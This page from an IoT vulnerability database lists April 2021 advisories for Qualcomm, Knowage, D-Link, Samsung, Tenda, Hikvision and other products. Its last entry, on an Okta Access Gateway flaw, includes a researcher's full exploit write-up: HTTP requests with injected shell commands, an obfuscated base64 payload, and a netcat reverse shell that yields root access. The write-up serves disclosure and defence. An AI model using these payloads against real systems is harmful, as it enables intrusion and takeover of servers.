VARIoT IoT vulnerabilities database
| VAR-202104-0035 | CVE-2020-11247 | plural Qualcomm Out-of-bounds read vulnerabilities in the product |
CVSS V2: 9.4 CVSS V3: 9.1 Severity: CRITICAL |
Out of bound memory read while unpacking data due to lack of offset length check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables. plural Qualcomm The product contains an out-of-bounds read vulnerability.Information is obtained and denial of service (DoS) It may be put into a state
| VAR-202104-0038 | CVE-2020-11255 | plural Qualcomm Product vulnerabilities to lack of memory release after expiration |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
Denial of service while processing RTCP packets containing multiple SDES reports due to memory for last SDES packet is freed and rest of the memory is leaked in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Wearables. plural Qualcomm The product contains a vulnerability regarding the lack of free memory after expiration.Denial of service (DoS) It may be put into a state
| VAR-202104-1112 | CVE-2021-30055 | Knowage Suite In SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A SQL injection vulnerability in Knowage Suite version 7.1 exists in the documentexecution/url analytics driver component via the 'par_year' parameter when running a report
| VAR-202104-1115 | CVE-2021-30058 | Knowage Suite Cross-site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Knowage Suite before 7.4 is vulnerable to cross-site scripting (XSS). An attacker can inject arbitrary external script in '/knowagecockpitengine/api/1.0/pages/execute' via the 'SBI_HOST' parameter
| VAR-202104-1114 | CVE-2021-30057 | Knowage Suite Injection vulnerability |
CVSS V2: 3.5 CVSS V3: 4.8 Severity: MEDIUM |
A stored HTML injection vulnerability exists in Knowage Suite version 7.1. An attacker can inject arbitrary HTML in "/restful-services/2.0/analyticalDrivers" via the 'LABEL' and 'NAME' parameters. Knowage Suite Is vulnerable to injection.Information may be obtained and information may be tampered with
| VAR-202104-1113 | CVE-2021-30056 | Knowage Suite Cross-site Scripting Vulnerability |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
Knowage Suite before 7.4 is vulnerable to reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in /restful-services/publish via the 'EXEC_FROM' parameter that can lead to data leakage
| VAR-202104-1987 | No CVE | SQL injection vulnerability exists in DCS Synthesis myRetailerPlus |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
myRetailerPlus is a web application.
DCS Synthesis myRetailerPlus has a SQL injection vulnerability, which can be exploited by attackers to obtain sensitive database information.
| VAR-202104-2051 | No CVE | Unauthorized access vulnerability exists in Panasonic cameras |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
WV-SW396 is a camera of Matsushita Electric (China) Co., Ltd.
Panasonic cameras have an unauthorized access vulnerability, which can be exploited by attackers to obtain sensitive information.
| VAR-202104-2053 | No CVE | SANYO camera has weak password vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Sanyo generally refers to Sanyo. Sanyo (English name: SANYO) is a large-scale enterprise group with a history of 60 years in Japan. Headquartered in Osaka, Japan, its products involve displays, mobile phones, digital cameras, machinery, biopharmaceuticals and many other fields.
The SANYO camera has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.
| VAR-202104-2054 | No CVE | Weak password vulnerability exists in tantos series cameras |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Shenzhen Zhianshi Technology Co., Ltd. is committed to the research and development of video surveillance technology and provides users with humanized video surveillance solutions.
The tantos series cameras have a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.
| VAR-202104-1998 | No CVE | DrayTek Vigor 2960/3900/300B VPN Firewall has a command injection vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
DrayTek Vigor series routers are dual WAN port security firewall routers designed for medium-sized enterprises.
DrayTek Vigor 2960/3900/300B VPN Firewall has a command injection vulnerability. Attackers can use the vulnerability to execute arbitrary commands to obtain router permissions.
| VAR-202104-2000 | No CVE | Arbitrary file reading vulnerability exists in Samsung router WLAN AP |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
Samsung (China) Investment Co., Ltd. is the headquarters of Samsung Group in China. As of the end of 2008, 20 of Samsung's more than 30 companies have invested in China, including Samsung Electronics, Samsung SDI, Samsung SDS, and Samsung Electro-Mechanics.
The Samsung router WLAN AP has an arbitrary file reading vulnerability. Attackers can use this vulnerability to read sensitive files on the router and obtain sensitive information.
| VAR-202104-2003 | No CVE | Samsung router WLAN AP has a command execution vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Samsung (China) Investment Co., Ltd. is the headquarters of Samsung Group in China. As of the end of 2008, 20 of Samsung's more than 30 companies have invested in China, including Samsung Electronics, Samsung SDI, Samsung SDS, and Samsung Electro-Mechanics.
Samsung router WLAN AP has a command execution vulnerability. Attackers can use this vulnerability to execute commands.
| VAR-202104-2002 | No CVE | Tenda router has weak password vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Shenzhen Jixiang Tengda Technology Co., Ltd. (hereinafter referred to as "Tengda") was founded in 1999 and is a professional supplier of network communication equipment and solutions.
The Tenda router has a weak password vulnerability. Attackers can use the default weak password to log in to the background of the system to obtain sensitive information.
| VAR-202104-1074 | CVE-2021-30127 | TerraMaster F2-210 Unauthorized authentication vulnerabilities in devices |
CVSS V2: 7.5 CVSS V3: 7.3 Severity: HIGH |
TerraMaster F2-210 devices through 2021-04-03 use UPnP to make the admin web server accessible over the Internet on TCP port 8181, which is arguably inconsistent with the "It is only available on the local network" documentation. NOTE: manually editing /etc/upnp.json provides a partial but undocumented workaround. TerraMaster F2-210 The device contains a vulnerability related to unauthorized authentication.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state
| VAR-202104-2005 | No CVE | Many Hikvision IP Cameras have weak password vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Hikvision is a video-centric intelligent IoT solution and big data service provider.
Many Hikvision IP Cameras have weak password vulnerabilities. Attackers use this vulnerability to log in to the system backend to gain administrator privileges.
| VAR-202104-1116 | CVE-2021-30072 | D-Link DIR-878 Out-of-bounds write vulnerability in device |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered in prog.cgi on D-Link DIR-878 1.30B08 devices. Because strcat is misused, there is a stack-based buffer overflow that does not require authentication. D-Link DIR-878 The device contains an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DIR-878 is a wireless router produced by D-Link in Taiwan.
The prog.cgi in D-Link DIR-878 1.30B08 has a stack buffer overflow vulnerability
| VAR-202104-0016 | CVE-2020-11922 | WiZ Connected WiZ Colors A60 Information Disclosure Vulnerability |
CVSS V2: 3.3 CVSS V3: 4.3 Severity: MEDIUM |
An issue was discovered in WiZ Colors A60 1.14.0. The device sends unnecessary information to the cloud controller server. Although this information is sent encrypted and has low risk in isolation, it decreases the privacy of the end user. The information sent includes the local IP address being used and the SSID of the Wi-Fi network the device is connected to. (Various resources such as wigle.net can be use for mapping of SSIDs to physical locations.). No detailed vulnerability details are currently provided. The Lightbulb by default transmits privacy sensitive info to the cloud system.
------------------------------------------
[Reference]
N/A
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Willem Westerhof, Wouter Wessels, Jim Blankendaal, Jasper Nota from Qbit in assignment of the Consumentenbond.
Use CVE-2020-11922
| VAR-202104-0151 | CVE-2020-27600 | D-Link Router DIR-846 In OS Command injection vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
HNAP1/control/SetMasterWLanSettings.php in D-Link D-Link Router DIR-846 DIR-846 A1_100.26 allows remote attackers to execute arbitrary commands via shell metacharacters in the ssid0 or ssid1 parameter. D-Link Router DIR-846 Has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DIR-846 is a 6-antenna 1200M full gigabit dual-band MU-MIMO wireless router.
D-Link DIR-846 A1_100.26 version has an OS command injection vulnerability
| VAR-202104-1194 | CVE-2021-28113 | Okta Access Gateway In OS Command injection vulnerability |
CVSS V2: 8.7 CVSS V3: 6.7 Severity: MEDIUM |
A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account.
Since the injection occurs when a script is executed with sudo, the commands are ran with root
privileges.
BUG #1 - relay
Command injection as root in Applications via the 'relaydomain' field when passing
parameters to generateCert.sh. This is blind injection, so without monitoring logs or
local execution instrumentation, the output will not simply returned in the response.
Also, the included 'nc' binary that the system image includes has the -e flag available
which enables an exploitation easier via connect back shell.
[Request]
POST /api/v1/app/idp/[valid-IDP] HTTP/1.1
Host: gw-admin.domain.tld
Content-Type: application/json;charset=utf-8
X-CSRF-TOKEN: [placeholder]
Content-Length: 134
Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]
{"settings":
{"label":"test",
"type":"CERTHEADER2015_APP",
"relaydomain":"..$(whoami)", <-- HERE
"groups":[],
"handlers":{}}
,"policies":[{}]}
[Response /w local instrumentation for monitoring]
pid=23033 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d .root ]
[Quick testing]
"relaydomain":"..$(reboot)"
and the system should reboot.
[Exploitation for reverse shell]
Note: for some bizzare reason, this payload worked for a period of time during testing, but was not generally reproducible afterwards.
1) generate base64 for the connect back command to be executed
$ echo -n "nc 10.0.0.111 5000 -e /bin/bash" | base64
bmMgMTAuMTAuMTAuMTc5IDU1NTUgLWUgL2Jpbi9iYXNo
2) start a listener
$ nc -l -p 5000
...
3) make the request with the payload (.. is required due to how it parses domains)
..$(echo${IFS}'bmMgMTAuMC4wLjExMSA1MDAwIC1lIC9iaW4vYmFzaA=='>test;$(base64${IFS}-d${IFS}test))
4) get a root shell from the server
* connection from 10.0.0.77 *
python -c 'import pty; pty.spawn("/bin/bash")'
[0] root@oag.okta.com;/root#
Note: the hostname of the local OAG test system happens to be oag.okta.com and has nothing to do with any Okta company servers.
BUG #2 - cookie
Command injection as root in Identity Providers via the 'cookieDomain' field when passing
parameters to generateCert.sh.
[Request]
POST /api/v1/setting/idp/local HTTP/1.1
Host: gw-admin.domain.tld
Content-Type: application/json;charset=utf-8
X-CSRF-TOKEN: [placeholder]
Content-Length: 222
Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]
{"subCategory":
"IDP_SAML_LOCAL",
"json":{
"name":"Local OAG IDP",
"host":"https://google.com",
"cookieDomain":"$(uname${IFS}-n)", <-- HERE
"nameIDFormat":"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified",
"metadata":{}},
"$edit":true}
[Response /w local instrumentation for monitoring]
pid=22822 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d Linux oag 3.10.0-957.27.2.el7.x86_64
#1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ]
[Quick testing]
"cookieDomain":"$(reboot)"
and the system should reboot.
[Exploitation for executing commands with output in the webroot]
Same note as the previous one; for some reason, this payload worked for a period of time during testing, but then stopped fully working (the bug was still there just less exploitable).
1) generate base64 for "ls -al /root" to be written to a location accessible via web request
$ echo -n "script -q -c ls\$IFS-al\$IFS/root /opt/oag/simpleSAMLphp/www/test.php" | base64 -w0
c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA==
2) make the request with the payload
$(echo${IFS}'c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA=='>test;$(base64${IFS}-d${IFS}test))
3) check https://gw-admin.domain.tld/auth/test.php for the output of the command
===
Fix
===
The cookie bug was a "known issue" and fixed in v2020.9.3 and the relay bug was also fixed and no longer works on the latest v2021.2.1.
https://www.okta.com/security-advisories/cve-2021-28113/